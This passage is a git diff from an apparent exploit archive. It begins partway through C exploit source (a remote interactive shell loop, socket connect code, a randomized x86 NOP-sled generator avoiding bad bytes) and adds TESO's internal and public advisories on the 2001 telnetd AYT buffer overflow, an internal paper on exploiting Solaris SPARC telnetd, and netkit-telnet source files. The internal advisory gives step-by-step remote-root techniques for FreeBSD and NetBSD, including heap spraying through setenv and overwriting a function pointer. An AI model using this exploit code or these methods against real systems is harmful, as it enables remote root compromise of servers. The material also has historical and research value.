&rfds, NULL, NULL, NULL); + if (FD_ISSET (0, &rfds)) { + l = read (0, buf, sizeof (buf)); + if (l <= 0) { + perror ("read user"); + exit (EXIT_FAILURE); + } + write (sock, buf, l); + } + + if (FD_ISSET (sock, &rfds)) { + l = read (sock, buf, sizeof (buf)); + if (l <= 0) { + perror ("read remote"); + exit (EXIT_FAILURE); + } + write (1, buf, l); + } + } +} + + +/* ripped from zodiac */ +void +hexdump (char *desc, unsigned char *data, unsigned int amount) +{ + unsigned int dp, p; /* data pointer */ + const char trans[] = + "................................ !\"#$%&'()*+,-./0123456789" + ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm" + "nopqrstuvwxyz{|}~...................................." + "....................................................." + "........................................"; + + + printf ("/* %s, %u bytes */\n", desc, amount); + + for (dp = 1; dp <= amount; dp++) { + fprintf (stderr, "%02x ", data[dp-1]); + if ((dp % 8) == 0) + fprintf (stderr, " "); + if ((dp % 16) == 0) { + fprintf (stderr, "| "); + p = dp; + for (dp -= 16; dp < p; dp++) + fprintf (stderr, "%c", trans[data[dp]]); + fflush (stderr); + fprintf (stderr, "\n"); + } + fflush (stderr); + } + if ((amount % 16) != 0) { + p = dp = 16 - (amount % 16); + for (dp = p; dp > 0; dp--) { + fprintf (stderr, " "); + if (((dp % 8) == 0) && (p != 8)) + fprintf (stderr, " "); + fflush (stderr); + } + fprintf (stderr, " | "); + for (dp = (amount - (16 - p)); dp < amount; dp++) + fprintf (stderr, "%c", trans[data[dp]]); + fflush (stderr); + } + fprintf (stderr, "\n"); + + return; +} + + + +unsigned long int +net_resolve (char *host) +{ + long i; + struct hostent *he; + + i = inet_addr(host); + if (i == -1) { + he = gethostbyname(host); + if (he == NULL) { + return (0); + } else { + return (*(unsigned long *) he->h_addr); + } + } + return (i); +} + + +int +net_connect (struct sockaddr_in *cs, char *server, + unsigned short int port, int sec) +{ + int n, + len, + error, + flags; + int fd; + struct timeval tv; + fd_set rset, wset; + struct sockaddr_in csa; + + if (cs == NULL) + cs = &csa; + + /* first allocate a socket */ + cs->sin_family = AF_INET; + cs->sin_port = htons (port); + fd = socket (cs->sin_family, SOCK_STREAM, 0); + if (fd == -1) + return (-1); + + if (!(cs->sin_addr.s_addr = net_resolve (server))) { + close (fd); + return (-1); + } + + flags = fcntl (fd, F_GETFL, 0); + if (flags == -1) { + close (fd); + return (-1); + } + n = fcntl (fd, F_SETFL, flags | O_NONBLOCK); + if (n == -1) { + close (fd); + return (-1); + } + + error = 0; + + n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in)); + if (n < 0) { + if (errno != EINPROGRESS) { + close (fd); + return (-1); + } + } + if (n == 0) + goto done; + + FD_ZERO(&rset); + FD_ZERO(&wset); + FD_SET(fd, &rset); + FD_SET(fd, &wset); + tv.tv_sec = sec; + tv.tv_usec = 0; + + n = select(fd + 1, &rset, &wset, NULL, &tv); + if (n == 0) { + close(fd); + errno = ETIMEDOUT; + return (-1); + } + if (n == -1) + return (-1); + + if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) { + if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) { + len = sizeof(error); + if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) { + errno = ETIMEDOUT; + return (-1); + } + if (error == 0) { + goto done; + } else { + errno = error; + return (-1); + } + } + } else + return (-1); + +done: + n = fcntl(fd, F_SETFL, flags); + if (n == -1) + return (-1); + return (fd); +} + + +/* imported from shellkit */ + +unsigned long int +random_get (unsigned long int low, unsigned long int high) +{ + unsigned long int val; + + if (low > high) { + low ^= high; + high ^= low; + low ^= high; + } + + val = (unsigned long int) random (); + val %= (high - low); + val += low; + + return (val); +} + + +void +random_init (void) +{ + srandom (time (NULL)); +} + + +int +bad (unsigned char u) +{ + if (u == '\x00' || u == '\x0a' || u == '\x0d' || u == '\x25') + return (1); + + return (0); +} + +int +badstr (unsigned char *code, int code_len, unsigned char *bad, int bad_len) +{ + int n; + + for (code_len -= 1 ; code_len >= 0 ; --code_len) { + for (n = 0 ; n < bad_len ; ++n) + if (code[code_len] == bad[n]) + return (1); + } + + return (0); +} + +unsigned long int +x86_nop_rwreg (void) +{ + unsigned long int reg; + + do { + reg = random_get (0, 7); + } while (reg == 4); /* 4 = $esp */ + + return (reg); +} + + + +unsigned long int +x86_nop_xfer (char *xferstr) +{ + int bw = 0; /* bitfield walker */ + unsigned char tgt; /* resulting instruction */ + + /* in a valid xferstr we trust */ + for (tgt = 0 ; xferstr != NULL && xferstr[0] != '\0' ; ++xferstr) { + switch (xferstr[0]) { + case ('0'): + BSET (tgt, 1, 0, bw); + break; + case ('1'): + BSET (tgt, 1, 1, bw); + break; + case ('r'): + BSET (tgt, 3, x86_nop_rwreg (), bw); + break; + case ('.'): + break; /* ignore */ + default: + fprintf (stderr, "on steroids, huh?\n"); + exit (EXIT_FAILURE); + break; + } + } + + if (bw != 8) { + fprintf (stderr, "invalid bitwalker: bw = %d\n", bw); + exit (EXIT_FAILURE); + } + + return (tgt); +} + + +unsigned int +x86_nop (unsigned char *dest, unsigned int dest_len, + unsigned char *bad, int bad_len) +{ + int walk; + int bcount; /* bad counter */ + char * xs; + char * xferstr[] = { + "0011.0111", /* aaa */ + "0011.1111", /* aas */ + "1001.1000", /* cbw */ + "1001.1001", /* cdq */ + "1111.1000", /* clc */ + "1111.1100", /* cld */ + "1111.0101", /* cmc */ + "0010.0111", /* daa */ + "0010.1111", /* das */ + "0100.1r", /* dec */ + "0100.0r", /* inc */ + "1001.1111", /* lahf */ + "1001.0000", /* nop */ + "1111.1001", /* stc */ + "1111.1101", /* std */ + "1001.0r", /* xchg al, */ + NULL, + }; + unsigned char tgt; + + + for (walk = 0 ; dest_len > 0 ; dest_len -= 1 , walk += 1) { + /* avoid endless loops on excessive badlisting */ + for (bcount = 0 ; bcount < 16384 ; ++bcount) { + xs = xferstr[random_get (0, 15)]; + tgt = x86_nop_xfer (xs); + + dest[walk] = tgt; + if (badstr (&dest[walk], 1, bad, bad_len) == 0) + break; + } + + /* should not happen */ + if (bcount >= 16384) { + fprintf (stderr, "too much blacklisting, giving up...\n"); + exit (EXIT_FAILURE); + } + } + + return (walk); +} + + diff --git a/exploits/7350854/7350854.id0 b/exploits/7350854/7350854.id0 new file mode 100644 index 0000000..5b092a6 Binary files /dev/null and b/exploits/7350854/7350854.id0 differ diff --git a/exploits/7350854/7350854.id1 b/exploits/7350854/7350854.id1 new file mode 100644 index 0000000..96f808d Binary files /dev/null and b/exploits/7350854/7350854.id1 differ diff --git a/exploits/7350854/7350854.nam b/exploits/7350854/7350854.nam new file mode 100644 index 0000000..3ff1397 Binary files /dev/null and b/exploits/7350854/7350854.nam differ diff --git a/exploits/7350854/7350854.til b/exploits/7350854/7350854.til new file mode 100644 index 0000000..ab7e149 Binary files /dev/null and b/exploits/7350854/7350854.til differ diff --git a/exploits/7350854/teso-advisory-011.tar.gz b/exploits/7350854/teso-advisory-011.tar.gz new file mode 100644 index 0000000..8d5f544 Binary files /dev/null and b/exploits/7350854/teso-advisory-011.tar.gz differ diff --git a/exploits/7350854/teso-advisory-011.txt b/exploits/7350854/teso-advisory-011.txt new file mode 100644 index 0000000..1c1bcbc --- /dev/null +++ b/exploits/7350854/teso-advisory-011.txt @@ -0,0 +1,307 @@ + + +WARNING: THIS IS NOT TO BE DISCLOSED TO ANYONE OUTSIDE OF TESO + +THIS IS A PRELIMINARY VERSION OF THE ADVISORY, IT WILL ONLY BE RELEASED IN +CASE OF LEAKAGE OF THE EXPLOIT/VULNERABILITY. + +btw, i have securely stamped myself the vulnerability, i can proof at any +point, that we knew it on 2001/06/12 or before. +(i found it on 2001/06/09) + +------ + +TESO Security Advisory +06/10/2001 + +Multiple vendor Telnet Daemon vulnerability + + +Summary +=================== + + Within most of the current telnet daemons in use today there exist a buffer + overflow in the telnet option handling. Under certain circumstances it may + be possible to exploit it to gain root priviledges remotely. + + +Systems Affected +=================== + + +Tests +=================== + + System | vulnerable | exploitable * + ----------------------------------------+--------------+------------------ + BSDI 4.x default | yes | yes + FreeBSD [2345].x default | yes | yes + IRIX 6.5 | yes | no + Linux netkit-telnetd < 0.14 | yes | ? + Linux netkit-telnetd >= 0.14 | no | + NetBSD 1.x default | yes | yes + OpenBSD 2.x | yes | ? + OpenBSD current | no | + Solaris 2.x sparc | yes | ? + ----------------------------------------+--------------+------------------ + + * = From our analysis and conclusions, which may not be correct or we may + have overseen things. Do not rely on this. + + Details about the systems can be found below. + + +Impact +=================== + + Through sending a specially formed option string to the remote telnet + daemon a remote attacker might be able to overwrite sensitive information + on the static memory pages. If done properly this may result in arbitrary + code getting executed on the remote machine under the priviledges the + telnet daemon runs on, usually root. + + +Explanation +=================== + + Within every BSD derived telnet daemon under UNIX the telnet options are + processed by the 'telrcv' function. This function parses the options + according to the telnet protocol and its internal state. During this + parsing the results which should be send back to the client are stored + within the 'netobuf' buffer. This is done without any bounds checking, + since it is assumed that the reply data is smaller than the buffer size + (which is BUFSIZ bytes, usually). + + However, using a combination of options, especially the 'AYT' Are You There + option, it is possible to append data to the buffer, usually nine bytes + long. To trigger this response, two bytes in the input buffer are + necessary. Since this input buffer is BUFSIZ bytes long, you can exceed the + output buffer by as much as (BUFSIZ / 2) * 9) - BUFSIZ bytes. For the + common case that BUFSIZ is defined to be 1024, this results in a buffer + overflow by up to 3584 bytes. On systems where BUFSIZ is defined to be + 4096, this is an even greater value (14336). + + Due to the limited set of characters an attacker is able to write outside + of the buffer it is difficult - if not impossible on some systems - to + exploit this buffer overflow. Another hurdle for a possible attacker may be + the lack of interesting information to modify after the buffer. + + This buffer overflow should be considered serious nevertheless, since + experience has shown that even complicated vulnerabilities can be + exploited by skilled attackers, BIND TSIG and SSH deattack come to mind. + + + Individual system notes + ======================= + + These notes include our rating about exploitability on the individual + systems. This may be invalid, due to us overlooking things or may be even + plain wrong. Also only the most common versions have been analyzed. If you + want to write an exploit, start here. + + + FreeBSD 4.0-REL + FreeBSD 4.2-REL + FreeBSD 4.3-BETA + NetBSD 1.5 + ---------------- + + The binaries of the 4.0-REL (781de77b29f1fc14daab6adefa31e6b9), 4.2-REL + (a0491784c6bd4662adc4eb806138f6f8) and 4.3-BETA + (ae32821691419385103f3ca7cef89703) release of the FreeBSD operating system + and the 1.5 release (e36b5295ae58821eab4d574e729bf356) of the NetBSD + operating system, the telnet daemon contains a function pointer + 'encrypt_output' near behind the 'netobuf' buffer, which we can overwrite. + This function pointer is used under certain circumstances to encrypt the + outgoing telnet traffic, which is called from the 'netflush' function. + + By overwriting this pointer in a special way one can make it point to the + upper heap space. By abusing the telnet daemons setenv functionality prior + to the overflow one can populate the upper heap space with shellcode and + nops, right there, where the function pointer will point to. + + The exploitation works in multiple phases: + + 1. Sending of ~16mb (32000 x 510 byte) bytes of nop space and shellcode + 2. Aligning the 'nfrontp' pointer to have this position + + ... | 0x00 . 0x00 0x00 0x00 | ... + + Where '|' is the boundary to the function pointer after the 'netobuf' + buffer. The '.' position marks where 'nfrontp' points at + 3. Send an 'IAC WILL 0x08' sequence, which will write: + + ... | 0x00 0xff 0xfb 0x08 | . 0x00 ... + + 4. Trigger the function pointer by causing the telnet daemon to call + 'netflush' + + Step 1 is a tedious process and can even locally take a few minutes, + because the entire environment array is walked every time a setenv is + called, to check whether the environment variable already exists. Steps 2 + to 4 are within a final overflow buffer, they are only seperated here for + clearness. The alignment in step 2 can be a problem since we can usually + only advance the 'nfrontp' pointer by three (IAC WILL|WONT|DO|DONT OPT + sequence) or nine ("\r\n[Yes]\r\n") bytes. To come around this we need an + advancement 'n' for that is true: n mod 3 = 1. XXX/TODO: write + + + FreeBSD 4.3-REL + --------------- + + Is not affected by the function pointer method. But the 'envinit' array is + behind the buffer. Normally the 'envinit' array is used to initialize the + 'environ' pointer with. The 'envinit' array is in the static memory too and + can be overwritten. + + Once setenv is called within the telnetd process, the FreeBSD C library + detects that the 'environ' environment pointer points to non allocated + space ('alloced' global variable is 0) and creates a copy of the array + within the heap space. From there on, all of the telnet daemons setenv + requests are inserted within this malloc-stored array and the 'envinit' + array, which we can overwrite, becomes useless. + + XXX/Proposed exploitation method: + + Overwrite envinit[0] with a valid pointer to an environment string such as + "LD_PRELOAD=/tmp/foo.so". Normally the clients environment set requests are + checked for sanity and invalid values such as "LD_*", "_RLD_*" and + "SHELLINIT" are avoided. By using this raw overwrite method we may have a + chance to inject an environment string directly into the environment array. + To make this work a few things have to be considered. First, the pointer + must be valid and point to mapped space. By overwritting the pointer and + then continuing the normal telnet login we may be able to trick the linker + into loading our bogus libraries. This would be a local root exploit or a + remote one, if we are able to store files on the remote host. + + + IRIX 6.5 + -------- + + The good thing about IRIX telnet daemon is that it comes with symbols. The + bad thing however is that it does not look to be exploitable. The memory + layout is quite easy (/usr/etc/telnetd is a N32 binary): + + sizes: (4160) | (4) | (4) | + what: netobuf | nfrontp | pfrontp | ... + + They define - as various other telnet daemons do - an extra bogus space to + the 'netobuf' buffer, which is 64 bytes (called "NETSLOP" in other daemons + sources). 'BUFSIZ' is defined to 1024 by default on IRIX, so at first + glance you might think it is a problem to overwrite 4160 bytes, but it is + not for that we can send fragmented TCP frames which can be up to 64 + kilobytes in size. So we can make a 4096 input buffer read without problems. + + But the real problem is the 'nfrontp'. Normally the decent MIPSPro C + Compiler optimizes as much pointers into registers as possible, but the + 'nfrontp' is defined static and used across all over the code, therefore + its memory bound into its place and always synced with its real value. If + we overwrite just parts of it, it reacts very sensitive and crashes at any + read/write access to it. Since IRIX uses the big endian mode of the MIPS + CPU the 'nfrontp' is stored with the most significant byte first in the + memory. It points to 'netobuf' which is defined on the '.bss' segment, + which is located at my installation at: 0x7fc49b70 to 0x7fc4f324. The + 'nfrontp' content looks like: + + ... (netobuf) ... | 0x7f 0xc4 0xcd 0xa8 | ... + + Since the 'nfrontp' is constantly accessed throughout the code, one has to + make it always containing a sane value. Only the mapped areas of the + process can be used for this, which are summarized, your addresses may vary: + + 0x7fff0000->0x7fff8000 stack + 0x0f9ec000->0x0fbe8000 various mapped files/libraries + 0x7fc00114->0x7fc4f400 .text/.*data/.bss and rest + + There may be a way by excessive grow of the heap by using setenv, some more + research for this architecture is required to draw a decision. From the + current point of view its very difficult, if not impossible to exploit this + bug on this binary. + + + Linux netkit-telnetd version < 0.14 + ----------------------------------- + + XXX/TODO: + + + Linux netkit-telnetd version >= 0.14 + ------------------------------------ + + Linux netkit-telnetd from version 0.14 is not directly affected by this bug + since they wrap a lot of storing operations which utilize 'nfrontp' in a + function 'netoprintf', which does boundary checking. + + However it has to be checked for a one byte overflow, which may be possible + at multiple occurances of the code, due to the insecure nature of handling + 'nfrontp'. Then, the following code in the function 'netoprintf' may fail + to do the boundary checking: + + int len, maxsize; + + maxsize = sizeof(netobuf) - (nfrontp - netobuf); + + va_start(ap, fmt); + len = vsnprintf(nfrontp, maxsize, fmt, ap); + va_end(ap); + + In case (nfrontp - netobuf) is greater than sizeof(netobuf), the integer + 'maxsize' will turn negative and casted to a very large value in the + snprintf handling, which makes it behave like sprintf without any boundary + checking. + + +Solution +=================== + + The vendors have been notified of the problem at the same time as the + general public, vendor patches for your telnet daemon that fix the bug will + show up soon. + + Sometimes a fix might not be trivial and require a lot of changes to the + source code, due to the insecure nature the 'nfrontp' pointer is handled. + The best long term solution is to disable the telnet daemon at all, since + there are good and free replacements. + + +Acknowledgements +=================== + + The bug has been discovered by scut. + + The tests and further analysis were done by smiler, zip and scut. + + +Contact Information +=================== + + The TESO crew can be reached by mailing to teso@team-teso.net + Our web page is at http://www.team-teso.net/ + + +References +=================== + + [1] TESO + http://www.team-teso.net/ + + +Disclaimer +=================== + + This advisory does not claim to be complete or to be usable for any + purpose. Especially information on the vulnerable systems may be inaccurate + or wrong. Possibly supplied exploit code is not to be used for malicious + purposes, but for educational purposes only. + + This advisory is free for open distribution in unmodified form. + Articles that are based on information from this advisory should include + link [1]. + + +Exploit +=================== + +------ + + diff --git a/exploits/7350854/teso-advisory-011/teso-advisory-011.txt b/exploits/7350854/teso-advisory-011/teso-advisory-011.txt new file mode 100644 index 0000000..64e9e71 --- /dev/null +++ b/exploits/7350854/teso-advisory-011/teso-advisory-011.txt @@ -0,0 +1,153 @@ +-----BEGIN PGP SIGNED MESSAGE----- +Hash: SHA1 + + +- ------ + +TESO Security Advisory +06/10/2001 + +Multiple vendor Telnet Daemon vulnerability + + +Summary +=================== + + Within most of the current telnet daemons in use today there exist a buffer + overflow in the telnet option handling. Under certain circumstances it may + be possible to exploit it to gain root priviledges remotely. + + +Systems Affected +=================== + + System | vulnerable | exploitable * + ----------------------------------------+--------------+------------------ + BSDI 4.x default | yes | yes + FreeBSD [2345].x default | yes | yes + IRIX 6.5 | yes | no + Linux netkit-telnetd < 0.14 | yes | ? + Linux netkit-telnetd >= 0.14 | no | + NetBSD 1.x default | yes | yes + OpenBSD 2.x | yes | ? + OpenBSD current | no | + Solaris 2.x sparc | yes | ? + | yes | ? + ----------------------------------------+--------------+------------------ + + * = From our analysis and conclusions, which may not be correct or we may + have overseen things. Do not rely on this. + + Details about the systems can be found below. + + +Impact +=================== + + Through sending a specially formed option string to the remote telnet + daemon a remote attacker might be able to overwrite sensitive information + on the static memory pages. If done properly this may result in arbitrary + code getting executed on the remote machine under the priviledges the + telnet daemon runs on, usually root. + + +Explanation +=================== + + Within every BSD derived telnet daemon under UNIX the telnet options are + processed by the 'telrcv' function. This function parses the options + according to the telnet protocol and its internal state. During this + parsing the results which should be send back to the client are stored + within the 'netobuf' buffer. This is done without any bounds checking, + since it is assumed that the reply data is smaller than the buffer size + (which is BUFSIZ bytes, usually). + + However, using a combination of options, especially the 'AYT' Are You There + option, it is possible to append data to the buffer, usually nine bytes + long. To trigger this response, two bytes in the input buffer are + necessary. Since this input buffer is BUFSIZ bytes long, you can exceed the + output buffer by as much as (BUFSIZ / 2) * 9) - BUFSIZ bytes. For the + common case that BUFSIZ is defined to be 1024, this results in a buffer + overflow by up to 3584 bytes. On systems where BUFSIZ is defined to be + 4096, this is an even greater value (14336). + + Due to the limited set of characters an attacker is able to write outside + of the buffer it is difficult - if not impossible on some systems - to + exploit this buffer overflow. Another hurdle for a possible attacker may be + the lack of interesting information to modify after the buffer. + + This buffer overflow should be considered serious nevertheless, since + experience has shown that even complicated vulnerabilities can be + exploited by skilled attackers, BIND TSIG and SSH deattack come to mind. + + We have constructed a working exploit for any version of BSDI, NetBSD and + FreeBSD. Exploitation on Solaris sparc may be possible but if it is, it is + very difficult involving lots of arcane tricks. OpenBSD is not as easily + exploitable as the other BSD's, because they do compile with other + options by default, changing memory layout. + + +Solution +=================== + + The vendors have been notified of the problem at the same time as the + general public, vendor patches for your telnet daemon that fix the bug will + show up soon. + + Sometimes a fix might not be trivial and require a lot of changes to the + source code, due to the insecure nature the 'nfrontp' pointer is handled. + The best long term solution is to disable the telnet daemon at all, since + there are good and free replacements. + + +Acknowledgements +=================== + + The bug has been discovered by scut. + + The tests and further analysis were done by smiler, lorian, zip and scut. + + +Contact Information +=================== + + The TESO crew can be reached by mailing to teso@team-teso.net + Our web page is at http://www.team-teso.net/ + + +References +=================== + + [1] TESO + http://www.team-teso.net/ + + +Disclaimer +=================== + + This advisory does not claim to be complete or to be usable for any + purpose. Especially information on the vulnerable systems may be inaccurate + or wrong. Possibly supplied exploit code is not to be used for malicious + purposes, but for educational purposes only. + + This advisory is free for open distribution in unmodified form. + Articles that are based on information from this advisory should include + link [1]. + + +Exploit +=================== + + Not this time. Not here. + +- ------ + + +-----BEGIN PGP SIGNATURE----- +Version: GnuPG v1.0.6 (GNU/Linux) +Comment: For info see http://www.gnupg.org + +iD8DBQE7VfBscZZ+BjKdwjcRAsTcAJ9esSlkS7BGkYM1Yulaz3zINqxpmgCeM885 +3thubMQc+6S4RpHasL0qz0Y= +=VT7y +-----END PGP SIGNATURE----- diff --git a/exploits/7350854/teso-howitmaybeworkonsparc.txt b/exploits/7350854/teso-howitmaybeworkonsparc.txt new file mode 100644 index 0000000..653d1a4 --- /dev/null +++ b/exploits/7350854/teso-howitmaybeworkonsparc.txt @@ -0,0 +1,59 @@ +-------------------------------------------------------------------------- +TESO Internal Paper +06/25/2001 + +How to exploit Telnet Daemon on Solaris Sparc +-------------------------------------------------------------------------- + +This Paper describes how i am going to try to exploit the telnet daemon +on Solaris Sparc maschines. The basic idea in exploiting was to overflow +the [netobuf] until we can overwrite the pointer [netibuf] which points +into heapspace and is meant for the incoming data. The idea was to fill +the heap before with environment variables so that 0x00FFFE08 points +into valid heapspace. Further was the idea to continue reading data +again from the socket and so overwriting the malloc structure in memory. +A carefully modification will allow us to overwrite an abritary memory +adress (GOT, PLT, RETADDR) with our returnadress so allowing us to +execute our own shellcode... + +So far the theory, now the hard reality... + +All info following is valid for the Solaris Sparc 2.6 in.telnetd binary +i had access to. + +the memorylayout is like this: + + 00000 netobuf[1024] + ... ++03063 ncc + ... ++03091 *netibuf + +and this memory layout is exactly what causes the problem. If we start +sending a bunch of IAC AYT request, we will overwrite ncc with a very +huge positive integer. This causes our telrcv function to loop again +and again. The telrcv function will only stop its loop if ncc becomes +negative or the ptyoutputbuffer is full. This will happen soon, but +after flushing it, the telrcv loop will continue. The major problem is +that [netibuf] is not big enough to hit the pointer, send an AO and +then hit ncc again to make it negative, because this is the only way +we are able to come to the next read... +The solution seems easy, but because i have no solaris shell i could +test it yet: +We sent a lot of envvars before trying to overwrite the vars, didnt we? +Because netibuf is malloc before the envvars, it is right infront of +them in heapspace. So our telrcv will very soon hit into one of our +envvars (the first one). We can store a IAC AO and lotsa 0xff 0xfb 0x80+ +there. (most probably we need more envvars). we need enough of them +to hit ncc again. this time it will make it negative and so the loop +ends and our new [netibuf] (which points somewhere in the middle of the +heap) The next read should give us enough power to read in any stuff to +corrupt the malloced envvars and so overwrite either plt, got or retloc. +the retaddr into our shellcode is easy to get, cause we know exactly the +offset where our netibuf is read to. (dont forget that 0xff will cause +problems... (so keep them out of shellcode)). + +This all must of course be tested and implemented... i am waiting for +a solaris sparc root account to do it... + +lorian diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/BUGS b/exploits/7350855-netkit/netkit-telnet-0.16/BUGS new file mode 100644 index 0000000..484d00d --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/BUGS @@ -0,0 +1,24 @@ +telnet: + - will apparently sometimes assert in ungetch. I think I've + fixed this, so if you still see it let me know. + - hangs if you telnet to chargen port and push ^Z + (due to bogus protocol negotiation attempts) + - binary mode doesn't handle crlf right + - should warn if the connection isn't encrypted + +telnetd: + - hangs if you do the following: + telnet + log in + cat >/dev/null + type 256 'a's with no CRs + *THIS IS A KERNEL BUG* Patch enclosed. + + - crashes in ncurses if the terminal type is undefined, + with some versions of ncurses. + - should allow passing random user envs as "TELNET_*" + - should set REMOTEHOST to the remote hostname + - passes login the -p flag instead of sending envs explicitly + - should only use included logout() et al. if real ones aren't + available in system libs. + - addarg() in sys_term.c does some very questionable casts. diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/ChangeLog b/exploits/7350855-netkit/netkit-telnet-0.16/ChangeLog new file mode 100644 index 0000000..01b552e --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/ChangeLog @@ -0,0 +1,152 @@ +13-Dec-1999: + Per recommendation of the linux-security-audit list, don't bother + (in telnetd) to ask termcap/ncurses if a terminal type is good; + assume it is. This means telnetd no longer links against termcap. + +12-Dec-1999: + Massive buffer cleanup in telnetd; minor cleanup to telnet. + +5-Dec-1999: + Remove some more bogus #ifdefs in telnet. + +29-Oct-1999: + Fix latent bug in the array classes used in telnet. + +14-Sep-1999: + Merge old fix to keep telnet from hanging up when under heavy load + (Olaf Kirch, okir@caldera.de) + +19-Aug-1999: + Patches for compiling with gcc 2.95. (Jeremy Buhler, + jbuhler@cs.washington.edu) + +18-Aug-1999: + netkit-telnet-0.14 released. + +17-Aug-1999: + telnetd patch from Chris Evans to reject termcap entries with + '/' in them, as libtermcap will treat them as paths and open + them as root, with various interesting consequences... + Issue found by Tymm Twillman (tymm@coe.missouri.edu). + +1-Aug-1999: + Massive cleanup of telnetd. Changed telnetd to use openpty() from + libutil, so we can let libc deal with changes in pty management. + +1-Aug-1999: + Did complete y2k and y2038 audit. + +31-Jul-1999: + Redid makefiles/config stuff for new confgen version. + +15-Jul-1999: + Set the process title (visible with ps) to show the remote host name. + Also filter control characters from the remote host name, just in case. + Set environment variable REMOTEHOST also. + +16-Oct-1997: + Added OPOST to the terminal stuff a la NCSA telnet fixup + +23-Sep-1997: + Assorted signed/unsigned character fixes and hacking in telnet. + (Martin Mares, mj@mj.gts.cz) + Fix various crashes in telnet arising from undefining environment + variables. + "telnet h" no longer prints a usage message. + +12-Jun-1997: + netkit-telnet-0.10 released. + +08-Jun-1997: + More adjustments for glibc. + Include kernel patch to fix hang on long input; thanks to Bill + Hawes (whawes@star.net). + +19-May-1997: + Fix some nonsense with ayt and signals, since glibc has SIGINFO. + +13-May-1997: + 8-bit fix to telnet. (Lukas Wunner, lukas@design.de) + Set ut_type correctly in telnetd's logout. (Steve Coile, + steve@patriot.net) + +05-Apr-1997: + Added configure script to generate MCONFIG. + Better utmp handling in telnetd. + +08-Mar-1997: + Split from full NetKit package. + Generated this change log from NetKit's. + +29-Dec-1996 + NetKit-0.09 released. + Assorted alpha/glibc patches. (Erik Troan, ewt@redhat.com) + Assorted bug fixes from Debian. (Peter Tobias, + tobias@et-inf.fho-emden.de) + Telnetd supports -L option for alternate login program. (Peter Tobias) + Hardened programs against DNS h_length spoofing attacks. + Use inet_aton() everywhere instead of inet_addr(). + Fixed crash in telnet caused by ^C or ^Z or ^\ under + certain circumstances. + Rewrote telnet and telnetd man pages. + +22-Aug-1996 + NetKit-B-0.08 released. + (almost) everything now compiles with lots of warnings turned on. + Massive hacking on telnet. + telnet honors the -E flag (was broken in .07, .07A) + telnetd intercepts ENV environment variable. + Merged libtelnet into telnet and telnetd dirs. + telnetd now sets idle tty devices to root.root mode 600. + +25-Jul-1996 + NetKit-B-0.07A released. + Fixed a bug in telnet where the escape character was being ignored. + Fixed a bug in telnetd; now uses the correct names for the last ptys + (that is, ptya0-ptyef, not ptyA0-ptyEf.) + +23-Jul-1996 + NetKit-B-0.07 released. + Integrated a collection of patches that had been lurking on the net, + including the 256-ptys support for telnetd and passive mode ftp. + Major security fixes, including to fingerd, lpr, rlogin, rsh, talkd, + and telnetd. Do *not* use the sliplogin from earlier versions of this + package, either. + Much of the code builds without libbsd.a or bsd includes. + Massive code cleanup. Almost everything compiles clean with gcc + -Wall now. rusers and rusersd do not; patches to rpcgen to fix + this would be appreciated if anyone feels like it. + Kerberos support has been removed. It didn't work anyway, and + proper Kerberos tools come with Kerberos. + New maintainer: David A. Holland, dholland@hcs.harvard.edu + +date not known + NetKit-B-0.06 released. + +date not known + NetKit-B-0.05 released. + Fixed writing entries to /var/adm/wtmp by ftpd, rlogind and + telnetd. (logwtmp.c) Florian + This is only necessary for the GNU last, not for the one + in util-linux... + +date not known + NetKit-B-0.04 released. + Did some nasty changes to telnet/extern.h. I should really take + the current version from NetBSD again and make a clean port of + it. (signals). + +date not known + NetKit-B-0.03 released. + telnetd: changed the default 'etc/issue.net' to not output the + hostname and then the domainname (that should be the fqdn, but + is wrong!) Changed also the man page issue.net.5 + changed telnetd to get the fqdn and not only use what + 'gethostname' returns + telnetd: changed some code back to original form to properly + enable binary mode negotiation (outgoing data wasn't binary) + Please test this out: do "telnet some_other_not_linux_host" and + then do "vi TEST_FILE" and test some strange characters >127 + like ° or §. + telnetd: added issue.net.5 to "make install" + diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/MCONFIG b/exploits/7350855-netkit/netkit-telnet-0.16/MCONFIG new file mode 100644 index 0000000..2e529ea --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/MCONFIG @@ -0,0 +1,20 @@ +# Generated by configure (confgen version 2) on Tue Aug 14 21:32:08 CEST 2001 +# + +BINDIR=/usr/bin +SBINDIR=/usr/sbin +MANDIR=/usr/man +BINMODE=755 +DAEMONMODE=755 +MANMODE=644 +PREFIX=/usr +EXECPREFIX=/usr +INSTALLROOT= +CC=gcc +CXX=gcc +CFLAGS=-O2 -Wall -W -Wpointer-arith -Wbad-function-cast -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-declarations -Wnested-externs -Winline +CXXFLAGS=-O2 -fno-rtti -fno-exceptions -Wall -W -Wpointer-arith -Wbad-function-cast -Wcast-qual -Wstrict-prototypes -Wmissing-prototypes -Wmissing-declarations -Wnested-externs -Winline +LDFLAGS= +LIBS=-lutil -lutil +LIBTERMCAP=-lncurses +USE_GLIBC=1 diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/MCONFIG.in b/exploits/7350855-netkit/netkit-telnet-0.16/MCONFIG.in new file mode 100644 index 0000000..cedb9d1 --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/MCONFIG.in @@ -0,0 +1,30 @@ +# Dirs +INSTALLROOT +BINDIR +MANDIR +SBINDIR + +# Modes +BINMODE +DAEMONMODE +MANMODE + +# Compiling +ALLWARNINGS +CC +CXX +CFLAGS +CXXFLAGS +LDFLAGS +LIBS + +# Features +FN(snprintf) +FN(logwtmp) +LIBTERMCAP +GLIBC +BSDSIGNAL + +# We actually use openpty, but they come from the same place on all systems +# I know. +FN(forkpty) diff --git a/exploits/7350855-netkit/netkit-telnet-0.16/MRULES b/exploits/7350855-netkit/netkit-telnet-0.16/MRULES new file mode 100644 index 0000000..6d8015e --- /dev/null +++ b/exploits/7350855-netkit/netkit-telnet-0.16/MRULES @@ -0,0 +1,8 @@ +# Standard 